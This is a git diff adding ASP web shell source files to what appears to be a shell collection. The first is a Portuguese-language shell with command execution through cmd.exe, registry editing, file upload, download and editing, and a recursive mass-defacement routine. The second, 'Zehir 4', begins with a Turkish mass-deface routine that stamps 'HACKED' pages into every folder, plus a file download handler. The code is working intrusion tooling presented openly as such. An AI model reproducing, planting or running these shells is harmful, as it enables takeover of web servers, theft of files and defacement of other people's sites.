+			Response.Write "<font face='arial' size='2'><center><br><br>Arquivo <b>" & caminho & "</b> apagado<br>"
+		End If
+	Case "ren"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		If Trim(Request.QueryString("status")) <> "2" Then
+			caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+			arquivo = showobj(caminho)
+			Response.Write "<br><font face=""arial"" size=""2""><b>" & arquivo & "</b><br>" & _
+						       "<form action=""" & Request.ServerVariables("SCRIPT_NAME") & """ method=""get"">" & _
+						       "<input type=""hidden"" name=""action"" value=""ren"">" & _
+						       "<input type=""hidden"" name=""status"" value=""2"">" & _
+						       "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>" & _
+						       "Digite o novo nome: <input type=""text"" name=""newname"">" & _
+						       "&nbsp;&nbsp;<input type=""submit"" value=""alterar"">" & _
+						       "</form>"
+		Else
+			caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			Set MyFile = ObjFSO.GetFile(caminho)
+			destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname"))
+			MyFile.Move (destino)
+			If Err.Number = 0 Then
+				Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>renomeado para<b>: " & destino
+				Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+			End If	
+		End If
+	Case "error"
+		Response.Write "<center><font face='arial' size='2' color='red'> <b>CÓDIGO CORROMPIDO<BR>CORRUPT CODE</font></center>"
+	Case "cmd"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Set oScript = Server.CreateObject("WSCRIPT.SHELL") 
+		Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 
+		Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 
+		szCMD = Request.QueryString(".CMD") 
+		If (szCMD <> "") Then 
+			szTempFile = "c:\" & oFileSys.GetTempName( ) 
+			Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 
+			Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 
+		End If 
+		Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET""><input type=""hidden"" name=""action"" value=""cmd""><input type=text name="".CMD"" size=45 value=""" & szCMD & """><input type=submit value=""Run""></FORM><br><br> "
+		If (IsObject(oFile)) Then 
+			On Error Resume Next 
+			Response.Write "<font face=""arial"">"
+			Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
+			oFile.Close 
+			Call oFileSys.DeleteFile(szTempFile, True) 
+		End If 
+	Case "info"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Set WshNetwork = Server.CreateObject("WScript.Network")
+		Set WshShell = Server.CreateObject("WScript.Shell")
+		Set WshEnv = WshShell.Environment("SYSTEM")
+		Response.Write "<br><font face=arial size=2>"
+		Response.Write "<b>IDENTIFICAÇÃO DE REDE:</b><br>"
+		Response.Write "<b>Usuário: </b>" & WshNetwork.UserName & "<br>"
+		Response.Write "<b>Nome do Computador: </b>" & WshNetwork.ComputerName & "<br>"
+		Response.Write "<b>Usuário do Domínio: </b>" & WshNetwork.UserDomain & "<br>"
+		Set Drives = WshNetwork.EnumNetworkDrives
+		For i = 0 to Drives.Count - 1
+			Response.Write "<b>Drive de Rede (Mapeado): </b>" & Drives.Item(i) & "<br>"
+		Next
+		Response.Write "<br><b>FÍSICO:</b><br>"
+		Response.Write "<b>Arquitetura do Processador: </b>" & WshEnv("PROCESSOR_ARCHITECTURE") & "<br>"
+		Response.Write "<b>Número de Processadores: </b>" & WshEnv("NUMBER_OF_PROCESSORS") & "<br>"
+		Response.Write "<b>Identificador do Processador: </b>" & WshEnv("PROCESSOR_IDENTIFIER") & "<br>"
+		Response.Write "<b>Nível do Processador: </b>" & WshEnv("PROCESSOR_LEVEL") & "<br>"
+		Response.Write "<b>Revisão do Processador: </b>" & WshEnv("PROCESSOR_REVISION") & "<br>"
+		Response.Write "<br><b>LÓGICO:</b><br>"
+		Response.Write "<b>IP: </b>" & request.servervariables("LOCAL_ADDR") & "<br>"
+		Response.Write "<b>Sistema Operacional: </b>" & WshEnv("OS") & "<br>"
+		Response.Write "<b>Servidor Web: </b>" & request.servervariables("SERVER_SOFTWARE") & "<br>"
+		Response.Write "<b>Especificação do Command: </b>" & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "<br>"
+		Response.Write "<b>Caminhos no Path: </b>" & WshEnv("PATH") & "<br>"
+		Response.Write "<b>Executáveis: </b>" & WshEnv("PATHEXT") & "<br>"
+		Response.Write "<b>Prompt: </b> " & WshEnv("PROMPT") & "<br>"
+		Response.Write "<b>System Drive: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "<br>"
+		Response.Write "<b>System Root: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "<br>"
+		Response.Write "<b>Caminho do System32: </b>" & WshShell.CurrentDirectory & "<br>"
+		Set Drives = Nothing
+		Set WshNetwork = Nothing
+		Set WshShell = Nothing
+		Set WshEnv = Nothing
+	Case "reg"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Set WshShell = Server.CreateObject("WScript.Shell")
+		Response.Write "<font face=""arial"" size=""2""><b>Editor de Registro:</b><br><br>"
+		Select Case Trim(Request.QueryString("regaction"))
+			Case "w"
+				If Trim(Request.QueryString("process")) = "yes" Then
+					Select Case Trim(Request.QueryString("type"))
+						Case "1"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ")
+						Case "2"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD")
+						Case "3"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY")
+						Case "4"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ")
+						Case "5"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ")
+					End Select
+					Response.Write "<center><br><font face=""arial"" size=""2"">Registro <b>"
+					Response.Write Trim(Request.QueryString("key")) & "</b> Escrito</center>"
+					Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+				Else
+					Response.Write "<table><tr><td><font face=""arial"" size=""2"">ROOT KEY NAME</td><td><font face=""arial"" size=""2"">ABREVIAÇÃO</td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_USER </td><td><font face=""arial"" size=""1""> HKCU </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_LOCAL_MACHINE </td><td><font face=""arial"" size=""1""> HKLM </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CLASSES_ROOT </td><td><font face=""arial"" size=""1""> HKCR </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_USERS </td><td><font face=""arial"" size=""1""> HKEY_USERS </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_CONFIG </td><td><font face=""arial"" size=""1""> HKEY_CURRENT_CONFIG </td></tr></table><br>"
+					Response.Write "<table><tr><td><font face=""arial"" size=""2"">Tipo </td><td><font face=""arial"" size=""2""> Descrição </td><td><font face=""arial"" size=""2""> Na forma de </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_SZ </td><td><font face=""arial"" size=""1""> string </td><td><font face=""arial"" size=""1""> string </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_DWORD </td><td><font face=""arial"" size=""1""> número </td><td><font face=""arial"" size=""1""> inteiro </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_BINARY </td><td><font face=""arial"" size=""1""> valor binário </td><td><font face=""arial"" size=""1""> VBArray de inteiros </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_EXPAND_SZ </td><td><font face=""arial"" size=""1""> string expandível (ex. ""%windir%\\calc.exe"") </td><td><font face=""arial"" size=""1""> string </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_MULTI_SZ </td><td><font face=""arial"" size=""1""> array de strings </td><td><font face=""arial"" size=""1""> VBArray de strings </td></tr></table>"
+					Response.Write "<br><br><FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
+					Response.Write "<table><tr><td><font face=""arial"" size=""1"">KEY: </td><td><input type=""text"" name=""key""> <font face=""arial"" size=""1""><br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )</td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">VALUE:</td><td><input type=""text"" name=""value""></td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">TYPE:</td><td><SELECT NAME=""type"">"
+					Response.Write "<OPTION VALUE=""1"">REG_SZ </option>"
+					Response.Write "<OPTION VALUE=""2"">REG_DWORD </option>"
+					Response.Write "<OPTION VALUE=""3"">REG_BINARY </option>"
+					Response.Write "<OPTION VALUE=""4"">REG_EXPAND_SZ </option>"
+					Response.Write "<OPTION VALUE=""5"">REG_MULTI_SZ </option></select><br>"
+					Response.Write "<input type=""hidden"" name=""regaction"" value=""w"">"
+					Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
+					Response.Write "<input type=""hidden"" name=""process"" value=""yes""></td></tr>"
+					Response.Write "<tr><td></td><td><input type=""submit"" value=""OK""></form></td></tr></table>"
+					Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+				End If
+			Case "r"
+				If Trim(Request.QueryString("process")) = "yes" Then
+					Response.Write "<font face=""arial"" size=""2"">" & Trim(Request.QueryString("key")) & "<br>"
+					Response.Write "Valor: <b>" & WshShell.RegRead (Trim(Request.QueryString("key")))
+				Else
+					Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
+					Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> <br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
+					Response.Write "<input type=""hidden"" name=""regaction"" value=""r"">"
+					Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
+					Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
+					Response.Write "<input type=""submit"" value=""OK""></form>"
+				End If
+				Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+			Case "d"
+				If Trim(Request.QueryString("process")) = "yes" Then
+					teste = WshShell.RegDelete (Trim(Request.QueryString("key")))
+					Response.Write "Chave <b>" & Trim(Request.QueryString("key")) & " </b>deletada"
+				Else
+					Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
+					Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
+					Response.Write "<input type=""hidden"" name=""regaction"" value=""d"">"
+					Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
+					Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
+					Response.Write "<input type=""submit"" value=""OK""></form>"
+				End If
+				Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+			Case Else
+				Response.Write "<font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=w"">ESCREVER CHAVE</a><br><br>"
+				Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=r"">LER CHAVE</a><br><br>"
+				Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=d"">DELETAR CHAVE</a><br>"
+		End Select
+		Set WshShell = Nothing
+	Case "txtview"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp & "<font face=""arial"" size=""2"">"
+		file = Replace(Trim(Request.QueryString("file")),"|","\")
+		Set fso = CreateObject("Scripting.FileSystemObject")  
+		Set a = fso.OpenTextFile(file)
+		Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
+		Set a = Nothing
+		Set fso = Nothing
+	Case "txtedit"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		If Request.Form.Count = 0 Then
+			file = Replace(Trim(Request.QueryString("file")),"|","\")
+			Set fso = CreateObject("Scripting.FileSystemObject")
+			Set a = fso.OpenTextFile(file)
+			Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
+			Response.Write "<textarea cols='85' rows='25' name=""content"" wrap=""physical"" >" & Server.HTMLEncode(a.ReadAll) & "</textarea><br>"
+			Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("file")) & """>"
+			Response.Write "<input type=""submit"" name=""savemethod"" value=""Save"">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=""submit"" name=""savemethod"" value=""Save as""></form>"
+			Set a = Nothing
+			Set fso = Nothing
+		Else
+			Select Case Trim(Request.Form("savemethod"))
+				Case "Save"
+					Set fso = CreateObject("Scripting.FileSystemObject")
+					novotexto = Trim(Request.Form("content"))
+					novotexto = Split(novotexto,vbCrLf)
+					Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2)
+					For i = 0 To UBound(novotexto)
+						objstream.WriteLine(novotexto(i))
+					Next
+					objstream.Close
+					Set objstream = Nothing
+					Response.Write "Texto salvo: <b>" & Replace(Trim(Request.Form("path")),"|","\") & "</b>"
+				Case "Save as"
+					Set fso = CreateObject("Scripting.FileSystemObject")
+					novotexto = Trim(Request.Form("content"))
+					novotexto = Split(novotexto,vbCrLf)
+					caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
+					Set objstream = fso.CreateTextFile(caminho,true,false)
+					For i = 0 To UBound(novotexto)
+						objstream.WriteLine(novotexto(i))
+					Next
+					objstream.Close
+					Set objstream = Nothing
+					Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
+					Response.Write "<input type=""text"" name=""filename"" value=""" & showobj(Replace(Trim(Request.Form("path")),"|","\")) & """><br>"
+					Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.Form("path")) & """>"
+					Response.Write "<input type=""submit"" name=""savemethod2"" value=""Save""></form>"
+				Case Else
+					caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
+					Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+					Set MyFile = ObjFSO.GetFile(caminho)
+					destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename"))
+					MyFile.Move (destino)
+					If Err.Number = 0 Then
+						Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & destino & "</b> salvo!"
+						Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+					End If	
+			End Select
+		End If
+	Case "download"
+		Response.Buffer = True
+		Response.Clear
+		strFileName = Replace(Trim(Request.QueryString("file")),"|","\")
+		strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\"))
+		strFileType = Request.QueryString("type")
+		if strFileType = "" then strFileType = "application/download"
+		Set fso = Server.CreateObject("Scripting.FileSystemObject")
+		Set f = fso.GetFile(strFilename)
+		intFilelength = f.size
+		Set f = Nothing
+		Set fso = Nothing
+		Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile
+		Response.AddHeader "Content-Length", intFilelength
+		Response.Charset = "UTF-8"
+		Response.ContentType = strFileType
+		Set Stream = Server.CreateObject("ADODB.Stream")
+		Stream.Open
+		Stream.type = 1
+		Stream.LoadFromFile strFileName
+		Response.BinaryWrite Stream.Read
+		Response.Flush
+		Stream.Close
+		Set Stream = Nothing
+	Case "upload"
+		If Request.QueryString("processupload") <> "yes" Then
+			Response.Write "<FORM METHOD=""POST"" ENCTYPE=""multipart/form-data"" ACTION=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&processupload=yes&path=" & Request.QueryString("path") & """>"
+			Response.Write "<TABLE BORDER=0>"
+			Response.Write "<tr><td><font face=""arial"" size=""2""><b>Select a file to upload:</b><br><INPUT TYPE=FILE SIZE=50 NAME=""FILE1""></td></tr>"
+			Response.Write "<tr><td align=""center""><font face=""arial"" size=""2""><INPUT TYPE=SUBMIT VALUE=""Upload!""></td></tr>"
+			Response.Write "</TABLE>"
+		Else
+			Set Uploader = New FileUploader
+			Uploader.Upload()
+			If Uploader.Files.Count = 0 Then
+				Response.Write "File(s) not uploaded."
+			Else
+				For Each File In Uploader.Files.Items
+					File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\")
+					Response.Write "File Uploaded: " & File.FileName & "<br>"
+					Response.Write "Size: " & File.FileSize & " bytes<br>"
+					Response.Write "Type: " & File.ContentType & "<br><br>"
+					Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+				Next
+			End If
+		End If
+	Case "mass"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo)
+			On Error Resume Next
+			Set MonRep = ObjFSO.GetFolder(caminhodomass)
+			Set ColFolders = MonRep.SubFolders
+			for each folderItem in ColFolders
+				destino1 = folderItem.path & "\index.htm"
+				destino2 = folderItem.path & "\index.html"
+				destino3 = folderItem.path & "\index.asp"
+				destino4 = folderItem.path & "\index.cfm"
+				destino5 = folderItem.path & "\index.php"
+				destino6 = folderItem.path & "\default.htm"
+				destino7 = folderItem.path & "\default.html"
+				destino8 = folderItem.path & "\default.asp"
+				destino9 = folderItem.path & "\default.cfm"
+				destino10 = folderItem.path & "\default.php"
+				MeuArquivo.Copy(destino1)
+				MeuArquivo.Copy(destino2)
+				MeuArquivo.Copy(destino3)
+				MeuArquivo.Copy(destino4)
+				MeuArquivo.Copy(destino5)
+				MeuArquivo.Copy(destino6)
+				MeuArquivo.Copy(destino7)
+				MeuArquivo.Copy(destino8)
+				MeuArquivo.Copy(destino9)
+				MeuArquivo.Copy(destino10)
+				Response.Write "<table><tr><td><font face='arial' size='2'>&lt;DIR&gt; " & folderItem.path & "</td>"
+				If Err.Number = 0 Then
+					Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>DONE!</font></td></tr>"
+				Else
+					Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr></table>"
+				End If
+				Err.Number = 0
+				Response.Flush
+				If metodo = "brute" Then
+					Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo)
+				End If
+			next
+		End Sub
+		Sub brutemass(caminho,massaction)
+			If massaction = "test" Then
+				On Error Resume Next
+				Set MonRep = ObjFSO.GetFolder(caminho)
+				Set ColFolders = MonRep.SubFolders
+				Set ColFiles0 = MonRep.Files
+				for each folderItem in ColFolders
+					Set TotalFolders = ObjFSO.GetFolder(folderItem.path)
+					Set EachFolder = TotalFolders.SubFolders
+					Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+					maindestino = folderItem.path & "\"
+					MeuArquivo.Copy(maindestino)
+					Response.Write "<tr><td><b><font face='arial' size='2'>&lt;DIR&gt; " & maindestino & "</b></td>"
+					If Err.Number = 0 Then
+						Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
+					Else
+						Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
+					End If
+					Err.Number = 0
+					Response.Flush
+					If EachFolder.count > 0 Then
+						masscontador = 0
+						for each subpasta in EachFolder
+							masscontador = masscontador + 1
+							destino = subpasta.path & "\"
+							If masscontador = 1 Then
+								destinofinal = destino
+								pathfinal = subpasta.path
+								Err.Number = 0
+								MeuArquivo.Copy(destinofinal)
+								Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(pathfinal) & "</td>"
+								If Err.Number = 0 Then
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
+								Else
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
+								End If
+								Err.Number = 0
+								Response.Flush
+							Else
+								MeuArquivo.Copy(destino)
+								Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(subpasta.path) & "</td>"
+								If Err.Number = 0 Then
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
+								Else
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
+								End If
+								Err.Number = 0
+								Response.Flush
+							End If
+						next
+						masscontador = 0
+					End If
+					Response.Write "</table><br>"
+					Call brutemass(folderItem.path & "\","test")
+				next
+				Set MonRep = Nothing
+				Set ColFolders = Nothing
+				Set ColFiles0 = Nothing
+			Else
+				If Request.Form.Count = 0 Then
+					Response.Write "<font face=""arial"" size=""2""><br><br><b>Brute:</b> copia os arquivos do deface para todas as pastas e subpastas (todos os níveis) do diretório escolhido (mais demorado). O tempo do deface vai variar de acordo com o numero TOTAL de diretórios.<br><br>"
+					Response.Write "<b>Single:</b> copia os arquivos do deface apenas para as pastas (primeiro nível) do diretório escolhido. Não inclui subpastas.<br><br>"
+					Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc"">"
+					Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>"
+					Response.Write "<center><font face=""arial"" size=""2"">Insira o código:<br>"
+					Response.Write "<textarea cols='65' rows='15' name=""content""></textarea><br>"
+					Response.Write "<input type=""radio"" name=""massopt"" value=""brute"" checked>Brute&nbsp;&nbsp;&nbsp;"
+					Response.Write "<input type=""radio"" name=""massopt"" value=""single"">Single<br>"
+					Response.Write "<input type=""submit"" value=""w00t!""></center>"
+					Response.Write "</form>"
+				Else
+					Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+					patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+					arquivomassdfc = patharquivotxt & "teste.txt"
+					Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False)
+					vetordelinhas = Split(Request.Form("content"),VbCrLf)
+					For i = 0 To UBound(vetordelinhas)
+						Arquivotxt.WriteLine(vetordelinhas(i))
+					Next
+					Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc)
+					
+					If Request.Form("massopt") = "single" Then
+						Call themassdeface(caminho,"single",ObjFSO,MeuArquivo)
+					ElseIf Request.Form("massopt") = "brute" Then
+						Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo)
+					End If
+				End If
+			End If
+		End Sub
+		If Trim(Request.QueryString("massact")) = "test" Then
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+			arquivo = patharquivotxt & "_vti_cnf.log"
+			Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True)
+			Set MeuArquivo = ObjFSO.GetFile(arquivo)
+			Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test")
+		ElseIf Trim(Request.QueryString("massact")) = "dfc" Then
+			Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc")
+		End If
+	Case Else
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Call showcontent()
+End Select
+If Err.Number <> 0 Then
+	Response.Write "<br><font face='arial' size='2'>ERRO: " & Err.Number & "<br><br><b>" & UCase(Err.Description) & "</b><br>Acesse o <b>ONLINE HELP</b> para a explicação do erro"
+End If
+Response.Write endcode
+%>
diff --git a/xakep-shells/ASP/Zehir 4.asp.txt b/xakep-shells/ASP/Zehir 4.asp.txt
new file mode 100644
index 0000000..1be2420
--- /dev/null
+++ b/xakep-shells/ASP/Zehir 4.asp.txt	
@@ -0,0 +1,1190 @@
+<%
+mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
+dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
+on error resume next
+Dim objFSO,popup
+Set objFSO = CreateObject ("Scripting.FileSystemObject")
+if Request("kuskapani")=1 then
+    Response.End
+end if
+
+
+if Request("kuskapani")=2 then
+    on error resume next
+    path = Request("path")
+    sFolder = Request("SubFolder")
+    fName = Request("FileName")
+    d1 = Request("dosya1")
+    d2 = Request("dosya2")
+    d3 = Request("dosya3")
+    d4 = Request("dosya4")
+    bg__ = Request.Form("selectColour")
+    if bg__ = "0" then bg__ = "#ffffff"
+    byMesaj = "<body bgColor='"&bg__&"'>" & Request("byMesaj") & "<br><br><center><font color=gray size=2>HACKED " & Session("n2") & "3 ;)</font>"
+
+    sFolder = Replace(sFolder,"/","\")
+
+    if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.SubFolders
+    h__ = 0
+    f__ = 0
+    ss__ = now
+    For Each f1 In fc
+        hedef_ = replace(f1.path,"/","\")
+        if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
+        hedef__ = left(hedef_,len(hedef_)-1)
+        folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\"))
+            if d1<>"" then d1 = true
+            if d2<>"" then d2 = true
+            if d3<>"" then d3 = true
+            if d4<>"" then d4 = true
+            on error goto 0:on error resume next
+            if fName<>"" then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName, True)
+                MyFile.write byMesaj
+            end if
+            if d1 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.htm", True)
+                MyFile.write byMesaj
+            end if
+            if d2 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.htm", True)
+                MyFile.write byMesaj
+            end if
+            if d3 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.asp", True)
+                MyFile.write byMesaj
+            end if
+            if d4 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.asp", True)
+                MyFile.write byMesaj
+            end if
+
+            if err<>0 then
+                response.Write folderName_ & " <font color=red>[FAILED!]</font><br>"
+                f__ = f__ + 1
+            else
+                response.Write folderName_ & " <font color=blue>[HACKED]</font><br>"
+                h__ = h__ + 1
+            end if
+    Next
+    ss___ = now
+    response.Write "<br><font color=white>by zehir!...</font><br><b>Sonuc : </b> Toplam Süre : "&left(ss__-ss___,5)&"sn. ;)<br><font color=blue>Hacked</font> = "&h__&"<br><font color=red>Failed</font> = "&f__
+    response.End
+end if
+
+status = Request("status")
+path   = Request("path")
+dPath  = Request("dPath")
+arama  = Request("txArama")
+dkayit = Request("dkayit")
+table  = Request("table")
+del    = Request("del")
+islem  = Request("islem")
+strSQL = Request("strSQL")
+cf       = Request("cf")
+pathfile = request("pathfile")
+if path="" then path=request.servervariables("APPL_PHYSICAL_PATH")
+if status="" then status=2
+popup = true
+'////////////////////////////////
+Function ReadBinaryFile(FileName)
+  Const adTypeBinary = 1
+  Dim BinaryStream
+  Set BinaryStream = CreateObject("ADODB.Stream")
+  BinaryStream.Type = adTypeBinary
+  BinaryStream.Open
+  BinaryStream.LoadFromFile FileName
+  ReadBinaryFile = BinaryStream.Read
+End Function
+if status="-3" then
+    Response.Buffer=True
+    Set Fil = objFSO.GetFile(pathfile)
+
+    Response.contenttype="application/force-download"
+    Response.AddHeader "Cache-control","private"
+    Response.AddHeader "Content-Length", Fil.Size
+    Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
+
+    Response.BinaryWrite readBinaryFile(Fil.path)
+    Set f = Nothing: Set Fil = Nothing
+    response.End()
+end if
+'//////////////////////////////////
+if status="-4" then popup=false
+if status="13" then popup=false
+if status="14" then popup=false
+if status="15" then popup=false
+if status="16" then popup=false
+if status="17" then popup=false
+if status="18" then popup=false
+if status="19" then popup=false
+if status="33" then popup=false
+if status="40" then popup=false
+if status="50" then popup=false
+byMsg = request.QueryString("byMsg")
+if byMsg<>"" then response.Write byMsg
+response.Write "<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&gt;</title>"
+if popup then
+%>
+<center>
+<a href="<%=dosyaPath%>?mevla=1&status=13" onclick="sistemBilgisi(this.href);return false;">System Info</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=40" onclick="sistemTest(this.href);return false;">System Test</a>
+<font color=yellow> | </font>
